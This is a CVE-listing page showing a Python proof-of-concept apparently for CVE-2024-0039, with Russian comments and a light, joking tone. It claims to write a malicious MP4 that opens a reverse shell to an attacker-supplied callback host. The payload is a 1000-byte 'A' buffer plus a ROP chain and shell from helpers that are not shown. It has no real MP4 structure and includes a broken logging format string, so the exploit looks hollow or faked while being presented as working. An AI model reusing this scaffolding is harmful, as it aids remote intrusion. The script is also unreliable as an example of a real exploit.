4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python
# ЭКСПЛОИТ ДЛЯ CVE-2024-0039
# 
# ВНИМАНИЕ: Этот код предназначен только для образовательных целей. 
# Никакие злонамеренные действия с использованием этого кода не допускаются.
# Используйте на свой страх и риск.
# 
# "С большой силой приходит большая ответственность." - Дядя Бен
#
# Описание:
# Этот скрипт создает MP4 файл, содержащий вредоносную нагрузку, 
# которая эксплуатирует уязвимость CVE-2024-0039, позволяя выполнить произвольный код.
# 
# Автор: 41yn41

import socket
import struct
import argparse
import sys
import logging
from utils.helpers import create_rop_chain, create_reverse_shell

# Настраиваем логирование (да, мы серьезны!)
logging.basicConfig(filename='logs/exploit.log', level=logging.INFO, 
                    format='%(asctime)s - %(levellevel)s - %(message)s')

def create_malicious_payload(cb_host, cb_port):
    """Создание вредоносного полезного груза с обратным подключением.
    
    Аргументы:
    cb_host -- IP-адрес для обратного подключения.
    cb_port -- Порт для обратного подключения.
    
    Возвращает:
    Полезный груз в виде байтов.
    """
    logging.info("Создаем ROP цепочку (без магии тут не обошлось)")
    rop_chain = create_rop_chain()
    
    logging.info("Создаем переполнение буфера (и заполняем его буквой 'A', потому что можем)")
    payload = b"A" * 1000  # Наполняем буфер "A"-шками, потому что почему бы и нет?
    payload += rop_chain

    logging.info("Создаем полезную нагрузку для обратного подключения (не пытайтесь это дома)")
    reverse_shell = create_reverse_shell(cb_host, cb_port)
    
    payload += reverse_shell
    return payload

def write_to_file(filename, content):
    """Запись содержимого в файл.
    
    Аргументы:
    filename -- Имя файла для записи.
    content -- Содержимое для записи.
    """
    logging.info(f"Запись полезного груза в файл {filename} (да, мы это сделали!)")
    with open(filename, 'wb') as f:
        f.write(content)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Эксплоит для CVE-2024-0039")
    parser.add_argument('--cb-host', required=True, help="Хост для обратного подключения")
    parser.add_argument('--cb-port', required=True, type=int, help="Порт для обратного подключения")
    parser.add_argument('--output', default='exploit.mp4', help="Имя выходного файла с вредоносным MP4")

    args = parser.parse_args()
    
    logging.info("Создание вредоносного полезного груза (готовьтесь к магии!)")
    payload = create_malicious_payload(args.cb_host, args.cb_port)
    write_to_file(args.output, payload)
    
    logging.info(f"Эксплоит успешно записан в {args.output} (мы это сделали!)")
    print(f"[+] Эксплоит записан в {args.output}")